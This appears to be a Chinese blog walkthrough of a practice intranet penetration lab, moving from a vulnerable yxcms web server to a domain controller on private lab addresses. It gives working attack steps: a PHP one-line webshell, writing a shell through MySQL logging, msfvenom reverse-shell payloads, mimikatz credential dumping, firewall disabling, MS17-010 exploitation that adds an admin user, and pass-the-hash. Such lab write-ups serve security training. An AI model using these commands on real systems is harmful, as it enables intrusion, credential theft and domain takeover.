红日内网渗透靶场1

发布于:2022-11-28 ⋅ 阅读:(302) ⋅ 点赞:(0)

目录

网络拓扑

环境配置

测试网络连通性

信息收集

漏洞利用

内网信息收集

内网攻击

横向移动


网络拓扑

 

环境配置

攻击机:kali

kali IP:192.168.123.129

WEB服务器:win7

1. 外网IP:192.168.123.153

2. 内网IP:192.168.52.143

域成员:win 2k3

IP:192.168.52.141

域控服务器:win 2008

网卡IP:192.168.52.138

测试网络连通性

win7  ping  win2k 、win2008

图-1


图-2 


信息收集

使用nmap对192.168.123.0/24网段进行扫描

nmap  -sV -sS -A 192.168.123.0/24

图-3 


发现80和3306端口开启,访问页面http://192.168.123.143/发现页面存在大量信息泄露,收集有效信息。

图-4


 发现网站底部有一个MySQL数据库连接检测:

图-5


尝试输入用户名和密码root/root,成功连接

图-6


使用御剑扫描目录发现网站备份文件和phpadmin后台管理界面

图-7 


打开备份文件发现网站源码,打开robots.txt发现网站CMSyxcms,访问进入网站首页

图-8 


漏洞利用

信息泄露+弱口令

网站泄露后台地址和用户密码,且用户密码为弱口令

图-9 


使用泄露的用户名密码成功登录网站后台界面

图-10 


yxcms留言本XSS存储型漏洞

利用存储型xss,在前台提交带有XSS代码的留言,

 图-11


后台审核成功弹出XSS弹窗

图-12 


审核通过之后,前台同样成功弹窗

图-13


yxcms后台任意文件读写漏洞

在后台创建新模板模块创建内容为一句话木马的新模板

图-14


图-15


通过前面的备份文件知道文件保存的目录

http://192.168.123.153/yxcms/protected/apps/default/view/default/

图-16


使用蚁剑成功连接shell

图-17


访问phpmyadmin,尝试使用弱口令root/root,可以登入

图-18


利用日志文件写入木马

1.开启日志功能

set global slow_query_log=’on’;

2.设置日志存储路径

set global general_log_file='C:/phpStudy/WWW/shell.php';

3.执行sql语句,写入一句话木马

select "<?php eval($_POST[cmd]);?>"

成功getshell

图-19


图-20


使用msf反弹shell

生成Windows后门程序反弹shell:

Msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.129 lport=6666 -f exe -o shell.exe

图-21


启动监听:

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.123.129

set lport 6666

show options

run

图-22


将生成的shell.exe利用蚁剑上传至win7并运行

成功反弹shell

图-23


上线cs

图-24


先创建监听器

图-25


生成后门

图-26


通过蚁剑把exe上传执行,成功上线

图-27


mimikatz工具抓取本机用户名密码:

图-28


图-29


msf上线cs

先记录要返回session的id,msf载入use exploit/windows/local/payload_inject模块,设置payload一定要与cs监听器保持一致:

图-30


lport写的是cs监听端口

lhost写的是cs主机ip

图-31


设置一个监听当msf发起攻击的时候,cs就会上线

图-32


成功上线:

图-33


添加路由到目标环境网络,使得msf能够通过win7路由转发访问192.168.25.0/24网段

run get_local_subnets   #查看路由信息

run autoroute -s 192.168.52.0/24  #添加一条路由

图-34


设置代理可以访问内网:

使用msf的socks代理模块

use auxiliary/server/socks

use auxiliary/server/socks_proxy

图-35


文本编辑 vim /etc/proxychains.conf,在最后一行加上socks5代理服务器

Socks5 192.168.123.129 1080

图-36


内网信息收集

使用msf查看补丁信息:run post/windows/gather/enum_patches

图-37


安装软件信息:run post/windows/gather/enum_applications

图-38


查看路由信息:run get_local_subnets

图-39


arp扫描52网段:run post/windows/gather/arp_scanner rhosts=192.168.52.0/24

图-40


关闭防火墙,开启3389进行远程连接

NetSh Advfirewall set allprofiles state off //关闭防火墙

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 //开启3389

使用获得的账户密码登录

图-41


发现当前主机安装了Nmap

直接利用这台主机上的工具来进行内网主机的端口扫描

图-42


进行端口扫描nmap -Pn -sT -p 1-1000 192.168.52.138

图-43


nmap -Pn -sT -p 1-1000 192.168.52.141

图-44


继续使用 nmap 进行主机漏洞扫描,查看是否存漏洞

nmap --script=vuln 192.168.52.128   存在ms17-010 漏洞

图-45


nmap --script=vuln 192.168.52.141  

存在ms08-067、ms17-010 漏洞

图-46


内网攻击

漏洞测试是否存在ms17-010:

search ms17-010 //查找ms17-010模块

use auxiliary/scanner/smb/smb_ms17_010 //使用此模块

set rhosts 192.168.52.138 192.168.52.141 //将rhosts参数设置为138 141两个IP

run //运行

图-47


use auxiliary/admin/smb/ms17_010_command //使用该模块

show options //查看配置

set command net user test @qwer1234 /add  //添加用户

set rhosts 192.168.52.138 //添加目标IP

run //运行

图-48


set command net localgroup administrators  test /add //将test添加到管理组

run //运行

图-49


set command net localgroup administrators //查看管理组成员

run //运行

图-50


set command NetSh Advfirewall set allprofiles state off //关闭防火墙

run //运行

图-51


use exploit/windows/smb/ms17_010_psexec //使用该模块

show options //查看配置

set rhosts 192.168.52.138 //设置目标IP

set payload windows/meterpreter/bind_tcp //选择正向连接

run //运行

图-52


成功拿到域控shell

横向移动

通过pwdump7得到Hash值

图-53


在Win7运行mimikatz哈希传递攻击脚本

mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:GOD /ntlm:2E8B24E00BD703E52CFE327A072006B0

图-53


图-54

本文含有隐藏内容,请 开通VIP 后查看